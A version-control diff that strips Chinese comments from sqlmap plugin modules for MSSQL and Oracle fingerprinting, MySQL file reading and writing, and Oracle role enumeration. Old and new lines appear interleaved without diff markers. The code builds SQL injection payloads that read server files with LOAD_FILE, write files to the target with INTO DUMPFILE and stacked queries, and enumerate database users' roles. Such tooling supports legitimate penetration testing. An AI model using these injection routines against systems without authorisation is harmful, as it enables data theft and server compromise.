from lib.core.common import Format # 导入 Format 类,用于格式化输出信息
from lib.core.convert import getUnicode # 导入 getUnicode 函数,用于获取 Unicode 字符串
from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.enums import OS # 导入 OS 枚举,定义操作系统类型
from lib.core.session import setDbms # 导入 setDbms 函数,用于设置数据库类型
from lib.core.settings import MSSQL_ALIASES # 导入 MSSQL_ALIASES 常量,定义 SQL Server 的别名
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 导入 GenericFingerprint 类,作为当前类的父类
# 定义 Fingerprint 类,继承自 GenericFingerprint
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.convert import getUnicode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import MSSQL_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
# 初始化 Fingerprint 类,设置数据库类型为 MSSQL
def __init__(self):
GenericFingerprint.__init__(self, DBMS.MSSQL)
# 定义 getFingerprint 方法,用于获取数据库指纹信息
def getFingerprint(self):
value = "" # 初始化指纹信息字符串
wsOsFp = Format.getOs("web server", kb.headersFp) # 获取 Web 服务器操作系统信息
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\
" % wsOsFp # 将 Web 服务器操作系统信息添加到指纹信息
value += "%s\n" % wsOsFp
if kb.data.banner: # 如果存在数据库 banner 信息
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) # 获取数据库操作系统信息
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\
" % dbmsOsFp # 将数据库操作系统信息添加到指纹信息
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: " # 添加数据库类型标签
actVer = Format.getDbms() # 获取数据库类型
value += "back-end DBMS: "
actVer = Format.getDbms()
if not conf.extensiveFp: # 如果不需要详细指纹信息
value += actVer # 将数据库类型添加到指纹信息
return value # 返回指纹信息
if not conf.extensiveFp:
value += actVer
return value
blank = " " * 15 # 定义缩进空格
value += "active fingerprint: %s" % actVer # 添加当前指纹信息
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp: # 如果存在数据库 banner 信息
release = kb.bannerFp.get("dbmsRelease") # 获取数据库版本发布信息
version = kb.bannerFp.get("dbmsVersion") # 获取数据库版本信息
servicepack = kb.bannerFp.get("dbmsServicePack") # 获取数据库服务包信息
if kb.bannerFp:
release = kb.bannerFp.get("dbmsRelease")
version = kb.bannerFp.get("dbmsVersion")
servicepack = kb.bannerFp.get("dbmsServicePack")
if release and version and servicepack: # 如果所有信息都存在
banVer = "%s %s " % (DBMS.MSSQL, release) # 构建 banner 版本信息
banVer += "Service Pack %s " % servicepack # 添加服务包信息
banVer += "version %s" % version # 添加版本信息
if release and version and servicepack:
banVer = "%s %s " % (DBMS.MSSQL, release)
banVer += "Service Pack %s " % servicepack
banVer += "version %s" % version
value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer) # 将 banner 版本信息添加到指纹信息
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes() # 获取 HTML 错误信息中的数据库信息
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp) # 将 HTML 错误信息中的数据库信息添加到指纹信息
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value # 返回指纹信息
return value
# 定义 checkDbms 方法,用于检查数据库类型是否为 MSSQL
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES): # 如果不需要详细指纹并且数据库别名匹配
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) # 设置数据库类型
self.getBanner() # 获取数据库 banner 信息
Backend.setOs(OS.WINDOWS) # 设置操作系统类型为 Windows
return True # 返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES):
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.MSSQL # 输出正在测试 MSSQL 的信息
infoMsg = "testing %s" % DBMS.MSSQL
logger.info(infoMsg)
# NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not
# work connecting directly to the Microsoft SQL Server database
if conf.direct: # 如果是直接连接
result = True # 直接设置为 True
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("UNICODE(SQUARE(NULL)) IS NULL") # 使用 SQL 注入检查
result = inject.checkBooleanExpression("UNICODE(SQUARE(NULL)) IS NULL")
if result: # 如果检查结果为 True
infoMsg = "confirming %s" % DBMS.MSSQL # 输出确认是 MSSQL 的信息
if result:
infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg)
# 遍历不同的 MSSQL 版本及其检查语句
for version, check in (
("2022", "CHARINDEX('16.0.',@@VERSION)>0"),
("2019", "CHARINDEX('15.0.',@@VERSION)>0"),
@ -107,46 +100,48 @@ class Fingerprint(GenericFingerprint):
("2005", "XACT_STATE()=XACT_STATE()"),
("2000", "HOST_NAME()=HOST_NAME()"),
):
result = inject.checkBooleanExpression(check) # 使用 SQL 注入检查版本
result = inject.checkBooleanExpression(check)
if result:
Backend.setVersion(version) # 设置数据库版本
Backend.setVersion(version)
break
if Backend.getVersion():
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) # 设置数据库类型和版本
setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion()))
else:
setDbms(DBMS.MSSQL) # 设置数据库类型
setDbms(DBMS.MSSQL)
self.getBanner() # 获取数据库 banner 信息
Backend.setOs(OS.WINDOWS) # 设置操作系统类型为 Windows
return True # 返回 True
else: # 如果检查结果为 False
warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL # 输出警告信息
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MSSQL
logger.warning(warnMsg)
return False # 返回 False
# 定义 checkDbmsOs 方法,用于检查数据库操作系统信息
return False
def checkDbmsOs(self, detailed=False):
if Backend.getOs() and Backend.getOsVersion() and Backend.getOsServicePack(): # 如果已获取操作系统信息,则直接返回
if Backend.getOs() and Backend.getOsVersion() and Backend.getOsServicePack():
return
if not Backend.getOs(): # 如果没有获取操作系统信息
Backend.setOs(OS.WINDOWS) # 设置操作系统类型为 Windows
if not Backend.getOs():
Backend.setOs(OS.WINDOWS)
if not detailed: # 如果不需要详细信息,则直接返回
if not detailed:
return
infoMsg = "fingerprinting the back-end DBMS operating system " # 输出正在获取操作系统版本和服务包的信息
infoMsg = "fingerprinting the back-end DBMS operating system "
infoMsg += "version and service pack"
logger.info(infoMsg)
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() # 输出操作系统类型
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") # 创建支持表,用于存储版本信息
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) # 将 @@VERSION 写入支持表
self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)")
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION"))
# 参考:https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
# Reference: https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
# https://en.wikipedia.org/wiki/Windows_NT#Releases
versions = {
"NT": ("4.0", (6, 5, 4, 3, 2, 1)),
@ -160,50 +155,50 @@ class Fingerprint(GenericFingerprint):
"10 or 11 or 2016 or 2019 or 2022": ("10.0", (0,))
}
# 获取数据库操作系统版本
# Get back-end DBMS underlying operating system version
for version, data in versions.items():
query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) # 构建查询语句
query += "LIKE '%Windows NT " + data[0] + "%')" # 添加版本判断条件
result = inject.checkBooleanExpression(query) # 使用 SQL 注入检查
query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%Windows NT " + data[0] + "%')"
result = inject.checkBooleanExpression(query)
if result:
Backend.setOsVersion(version) # 设置操作系统版本
infoMsg += " %s" % Backend.getOsVersion() # 将操作系统版本信息添加到日志信息
Backend.setOsVersion(version)
infoMsg += " %s" % Backend.getOsVersion()
break
if not Backend.getOsVersion(): # 如果没有获取到操作系统版本
Backend.setOsVersion("2003") # 默认设置为 2003
Backend.setOsServicePack(2) # 默认设置为服务包 2
if not Backend.getOsVersion():
Backend.setOsVersion("2003")
Backend.setOsServicePack(2)
warnMsg = "unable to fingerprint the underlying operating "
warnMsg += "system version, assuming it is Windows "
warnMsg += "%s Service Pack %d" % (Backend.getOsVersion(), Backend.getOsServicePack())
logger.warning(warnMsg)
self.cleanup(onlyFileTbl=True) # 清理支持表
self.cleanup(onlyFileTbl=True)
return
# 获取操作系统服务包
sps = versions[Backend.getOsVersion()][1] # 获取服务包列表
# Get back-end DBMS underlying operating system service pack
sps = versions[Backend.getOsVersion()][1]
for sp in sps:
query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) # 构建查询语句
query += "LIKE '%Service Pack " + getUnicode(sp) + "%')" # 添加服务包判断条件
result = inject.checkBooleanExpression(query) # 使用 SQL 注入检查
query = "EXISTS(SELECT %s FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%Service Pack " + getUnicode(sp) + "%')"
result = inject.checkBooleanExpression(query)
if result:
Backend.setOsServicePack(sp) # 设置操作系统服务包
Backend.setOsServicePack(sp)
break
if not Backend.getOsServicePack(): # 如果没有获取到服务包
debugMsg = "assuming the operating system has no service pack" # 输出调试信息
if not Backend.getOsServicePack():
debugMsg = "assuming the operating system has no service pack"
logger.debug(debugMsg)
Backend.setOsServicePack(0) # 默认设置为服务包 0
Backend.setOsServicePack(0)
if Backend.getOsVersion():
infoMsg += " Service Pack %d" % Backend.getOsServicePack() # 将服务包信息添加到日志信息
infoMsg += " Service Pack %d" % Backend.getOsServicePack()
logger.info(infoMsg)
self.cleanup(onlyFileTbl=True) # 清理支持表
self.cleanup(onlyFileTbl=True)

122
src/sqlmap-master/plugins/dbms/mysql/filesystem.py
Unescape View File

@ -5,118 +5,96 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 1. 从库中导入需要的模块
from lib.core.agent import agent # SQL 注入执行代理
from lib.core.common import getSQLSnippet # 获取 SQL 代码片段
from lib.core.common import isNumPosStrValue # 检查值是否为正数
from lib.core.common import isTechniqueAvailable # 判断某注入方法是否可用
from lib.core.common import popValue # 弹出栈值
from lib.core.common import pushValue # 压入栈值
from lib.core.common import randomStr # 生成随机字符串
from lib.core.common import singleTimeWarnMessage # 输出只显示一次的警告
from lib.core.compat import xrange # 兼容的 range 函数
from lib.core.data import conf # 全局配置信息
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.decorators import stackedmethod # 堆叠方法装饰器
from lib.core.enums import CHARSET_TYPE # 字符集类型
from lib.core.enums import DBMS # 数据库类型枚举
from lib.core.enums import EXPECTED # 期望类型
from lib.core.enums import PAYLOAD # payload 类型
from lib.core.enums import PLACE # 注入位置
from lib.core.exception import SqlmapNoneDataException # 无数据异常
from lib.request import inject # 注入相关函数
from lib.request.connect import Connect as Request # 连接请求
from lib.techniques.union.use import unionUse # UNION 注入方法
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 通用文件系统操作类
# 2. 定义一个类 Filesystem继承自 GenericFilesystem
from lib.core.agent import agent
from lib.core.common import getSQLSnippet
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomStr
from lib.core.common import singleTimeWarnMessage
from lib.core.compat import xrange
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.decorators import stackedmethod
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.exception import SqlmapNoneDataException
from lib.request import inject
from lib.request.connect import Connect as Request
from lib.techniques.union.use import unionUse
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
# 3. 非堆叠读取文件的方法
def nonStackedReadFile(self, rFile):
# 4. 如果不是暴力模式,则输出读取文件信息
if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
# 5. 执行SQL注入读取文件内容并以十六进制返回
result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)
# 6. 返回读取结果
return result
# 7. 堆叠读取文件的方法
def stackedReadFile(self, remoteFile):
# 8. 如果不是暴力模式,则输出读取文件信息
if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg)
# 9. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
# 10. 获取远程临时目录
self.getRemoteTempPath()
# 11. 构建临时文件名
tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))
# 12. 输出调试信息
debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile
debugMsg += "into temporary file '%s'" % tmpFile
logger.debug(debugMsg)
# 13. 通过堆叠查询,将文件内容以十六进制形式保存到临时文件
inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile))
# 14. 输出调试信息
debugMsg = "loading the content of hexadecimal encoded file "
debugMsg += "'%s' into support table" % remoteFile
logger.debug(debugMsg)
# 15. 通过堆叠查询,将临时文件内容导入到支持表中
inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))
# 16. 从支持表中获取文件内容的长度
length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
# 17. 如果获取到的文件长度不合法
if not isNumPosStrValue(length):
warnMsg = "unable to retrieve the content of the "
warnMsg += "file '%s'" % remoteFile
# 18. 如果是直接模式或可以使用UNION注入
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
if not kb.bruteMode:
warnMsg += ", going to fall-back to simpler UNION technique"
logger.warning(warnMsg)
# 19. 使用非堆叠方法读取文件
result = self.nonStackedReadFile(remoteFile)
else:
# 20. 如果没有可用的方法,则抛出异常
raise SqlmapNoneDataException(warnMsg)
else:
# 21. 将获取到的文件长度转为整数
length = int(length)
chunkSize = 1024
# 22. 如果文件长度大于 chunkSize
if length > chunkSize:
result = []
# 23. 循环读取文件内容
for i in xrange(1, length, chunkSize):
chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
else:
# 24. 直接读取文件内容
result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
# 25. 返回文件内容
return result
# 26. 使用 UNION 注入写入文件的方法
@stackedmethod
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value")
# 27. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", True)
fcEncodedStr = fcEncodedList[0]
fcEncodedStrLen = len(fcEncodedStr)
# 28. 如果在 GET 请求中且编码后的长度大于 8000则输出警告信息
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "as the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
@ -124,36 +102,28 @@ class Filesystem(GenericFilesystem):
warnMsg += "writing process"
logger.warning(warnMsg)
# 29. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg)
# 30. 强制使用负数 where 条件
pushValue(kb.forceWhere)
kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
# 31. 构建 SQL 查询语句
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile)
# 32. 执行 SQL 查询
unionUse(sqlQuery, unpack=False)
kb.forceWhere = popValue()
# 33. 输出警告信息,提示文件可能包含垃圾字符
warnMsg = "expect junk characters inside the "
warnMsg += "file as a leftover from UNION query"
singleTimeWarnMessage(warnMsg)
# 34. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 35. 使用 LINES TERMINATED 写入文件的方法
def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value")
# 36. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", True)
fcEncodedStr = fcEncodedList[0][2:]
fcEncodedStrLen = len(fcEncodedStr)
# 37. 如果在 GET 请求中且编码后的长度大于 8000则输出警告信息
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
@ -161,59 +131,47 @@ class Filesystem(GenericFilesystem):
warnMsg += "writing process"
logger.warning(warnMsg)
# 38. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg)
# 39. 获取 SQL 代码片段
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr)
# 40. 添加 SQL 前缀
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
# 41. 生成 payload
payload = agent.payload(newValue=query)
# 42. 执行 SQL 查询
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
# 43. 输出警告信息,提示文件可能包含垃圾字符
warnMsg = "expect junk characters inside the "
warnMsg += "file as a leftover from original query"
singleTimeWarnMessage(warnMsg)
# 44. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 45. 使用堆叠查询写入文件的方法
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# 46. 输出调试信息
debugMsg = "creating a support table to write the hexadecimal "
debugMsg += "encoded file to"
logger.debug(debugMsg)
# 47. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "longblob")
# 48. 输出调试信息
logger.debug("encoding file to its hexadecimal string value")
# 49. 对本地文件进行十六进制编码
fcEncodedList = self.fileEncode(localFile, "hex", False)
# 50. 输出调试信息
debugMsg = "forging SQL statements to write the hexadecimal "
debugMsg += "encoded file to the support table"
logger.debug(debugMsg)
# 51. 将文件内容转换为 SQL 查询语句
sqlQueries = self.fileToSqlQueries(fcEncodedList)
# 52. 输出调试信息
logger.debug("inserting the hexadecimal encoded file to the support table")
# 53. 设置最大允许的数据包大小
inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230)
# 54. 循环执行 SQL 查询语句
for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery)
# 55. 输出调试信息
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg)
# 56. 使用 DUMPFILE 将数据导出到远程文件
# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True)
# 57. 检查写入的文件
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)

92
src/sqlmap-master/plugins/dbms/oracle/enumeration.py
Unescape View File

@ -5,91 +5,85 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 1. 导入必要的模块
from lib.core.common import getLimitRange # 获取限制范围
from lib.core.common import isAdminFromPrivileges # 判断是否为管理员
from lib.core.common import isInferenceAvailable # 判断是否可以使用推断注入
from lib.core.common import isNoneValue # 判断是否为 None 值
from lib.core.common import isNumPosStrValue # 判断是否为数字正字符串值
from lib.core.common import isTechniqueAvailable # 判断是否可以使用特定注入技术
from lib.core.compat import xrange # 兼容 Python 2 和 3 的 xrange
from lib.core.data import conf # 全局配置信息
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.data import queries # SQL 查询语句
from lib.core.enums import CHARSET_TYPE # 字符集类型枚举
from lib.core.enums import DBMS # 数据库管理系统枚举
from lib.core.enums import EXPECTED # 预期返回类型枚举
from lib.core.enums import PAYLOAD # 注入类型枚举
from lib.core.exception import SqlmapNoneDataException # 没有数据异常
from lib.core.settings import CURRENT_USER # 当前用户
from lib.request import inject # 注入相关函数
from plugins.generic.enumeration import Enumeration as GenericEnumeration # 通用枚举类
# 2. 定义一个类 Enumeration继承自 GenericEnumeration
from lib.core.common import getLimitRange
from lib.core.common import isAdminFromPrivileges
from lib.core.common import isInferenceAvailable
from lib.core.common import isNoneValue
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.compat import xrange
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import CURRENT_USER
from lib.request import inject
from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
# 3. 获取数据库用户角色
def getRoles(self, query2=False):
# 4. 输出获取数据库用户角色信息
infoMsg = "fetching database users roles"
# 5. 从查询集中获取角色查询语句
rootQuery = queries[DBMS.ORACLE].roles
# 6. 如果用户名为当前用户,则获取当前用户名
if conf.user == CURRENT_USER:
infoMsg += " for current user"
conf.user = self.getCurrentUser()
logger.info(infoMsg)
# 7. 存储管理员用户的集合
# Set containing the list of DBMS administrators
areAdmins = set()
# 8. 检查是否存在可用的注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 9. 选择使用哪个查询语句
if query2:
query = rootQuery.inband.query2
condition = rootQuery.inband.condition2
else:
query = rootQuery.inband.query
condition = rootQuery.inband.condition
# 10. 如果指定了用户名,则添加到查询条件中
if conf.user:
users = conf.user.split(',')
query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
# 11. 执行查询语句,获取用户角色信息
values = inject.getValue(query, blind=False, time=False)
# 12. 如果没有获取到数据,尝试使用备用表 `USER_ROLE_PRIVS`
if not values and not query2:
infoMsg = "trying with table 'USER_ROLE_PRIVS'"
logger.info(infoMsg)
return self.getRoles(query2=True)
# 13. 处理获取到的用户角色信息
if not isNoneValue(values):
for value in values:
user = None
roles = set()
for count in xrange(0, len(value or [])):
# 14. 第一列为用户名
# The first column is always the username
if count == 0:
user = value[count]
# 15. 其他列为角色
# The other columns are the roles
else:
role = value[count]
# In Oracle we get the list of roles as string
roles.add(role)
# 16. 将用户角色信息添加到缓存中
if user in kb.data.cachedUsersRoles:
kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user]))
else:
kb.data.cachedUsersRoles[user] = list(roles)
# 17. 如果没有获取到用户角色信息,尝试使用推断注入
if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct:
# 18. 获取用户名列表
if conf.user:
users = conf.user.split(',')
else:
@ -99,11 +93,13 @@ class Enumeration(GenericEnumeration):
users = kb.data.cachedUsers
retrievedUsers = set()
# 19. 遍历用户列表,获取每个用户的角色信息
for user in users:
unescapedUser = None
if user in retrievedUsers:
continue
infoMsg = "fetching number of roles "
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
@ -117,13 +113,13 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count2 % queryUser
else:
query = rootQuery.blind.count % queryUser
# 20. 获取每个用户的角色数量
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
# 21. 如果没有获取到角色数量,尝试使用备用表 `USER_SYS_PRIVS`
if not isNumPosStrValue(count):
if count != 0 and not query2:
infoMsg = "trying with table 'USER_SYS_PRIVS'"
logger.info(infoMsg)
return self.getPrivileges(query2=True)
warnMsg = "unable to retrieve the number of "
@ -137,33 +133,33 @@ class Enumeration(GenericEnumeration):
roles = set()
indexRange = getLimitRange(count, plusOne=True)
# 22. 遍历角色索引,获取每个角色信息
for index in indexRange:
if query2:
query = rootQuery.blind.query2 % (queryUser, index)
else:
query = rootQuery.blind.query % (queryUser, index)
role = inject.getValue(query, union=False, error=False)
# In Oracle we get the list of roles as string
roles.add(role)
# 23. 将获取到的角色信息添加到缓存中
if roles:
kb.data.cachedUsersRoles[user] = list(roles)
else:
warnMsg = "unable to retrieve the roles "
warnMsg += "for user '%s'" % user
logger.warning(warnMsg)
retrievedUsers.add(user)
# 24. 如果没有获取到用户角色信息,抛出异常
if not kb.data.cachedUsersRoles:
errMsg = "unable to retrieve the roles "
errMsg += "for the database users"
raise SqlmapNoneDataException(errMsg)
# 25. 从角色信息中判断管理员用户
for user, privileges in kb.data.cachedUsersRoles.items():
if isAdminFromPrivileges(privileges):
areAdmins.add(user)
# 26. 返回用户角色信息和管理员用户
return kb.data.cachedUsersRoles, areAdmins
return kb.data.cachedUsersRoles, areAdmins

80
src/sqlmap-master/plugins/dbms/oracle/fingerprint.py
Unescape View File

@ -5,120 +5,106 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 1. 导入必要的模块
import re # 正则表达式模块
from lib.core.common import Backend # 后端数据库信息
from lib.core.common import Format # 格式化输出
from lib.core.data import conf # 全局配置信息
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.enums import DBMS # 数据库管理系统枚举
from lib.core.session import setDbms # 设置数据库管理系统
from lib.core.settings import ORACLE_ALIASES # Oracle 数据库别名
from lib.request import inject # 注入相关函数
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 通用指纹识别类
# 2. 定义一个类 Fingerprint继承自 GenericFingerprint
import re
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.session import setDbms
from lib.core.settings import ORACLE_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
# 3. 构造函数,初始化数据库类型为 Oracle
def __init__(self):
GenericFingerprint.__init__(self, DBMS.ORACLE)
# 4. 获取指纹信息
def getFingerprint(self):
value = ""
# 5. 获取 Web 服务器的操作系统指纹
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\
" % wsOsFp
value += "%s\n" % wsOsFp
# 6. 获取后端数据库的操作系统指纹
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\
" % dbmsOsFp
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
# 7. 如果没有启用详细指纹识别,则只输出数据库类型
if not conf.extensiveFp:
value += DBMS.ORACLE
return value
# 8. 获取激活的数据库指纹
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
# 9. 如果有 Banner 信息,则获取 Banner 解析指纹
if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion")
if banVer:
banVer = Format.getDbms([banVer])
value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
# 10. 如果有 HTML 错误信息,则获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
# 11. 检查数据库类型是否为 Oracle
def checkDbms(self):
# 12. 如果没有启用详细指纹识别,并且后端数据库是 Oracle 的别名,则设置数据库类型并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES):
setDbms(DBMS.ORACLE)
self.getBanner()
return True
# 13. 输出测试数据库类型信息
infoMsg = "testing %s" % DBMS.ORACLE
logger.info(infoMsg)
# 14. 如果是直接连接,则跳过以下测试
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
# not work connecting directly to the Oracle database
if conf.direct:
result = True
# 15. 否则,测试数据库是否满足条件 LENGTH(SYSDATE)=LENGTH(SYSDATE)
else:
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
# 16. 如果测试结果为 True则进一步确认数据库类型
if result:
infoMsg = "confirming %s" % DBMS.ORACLE
logger.info(infoMsg)
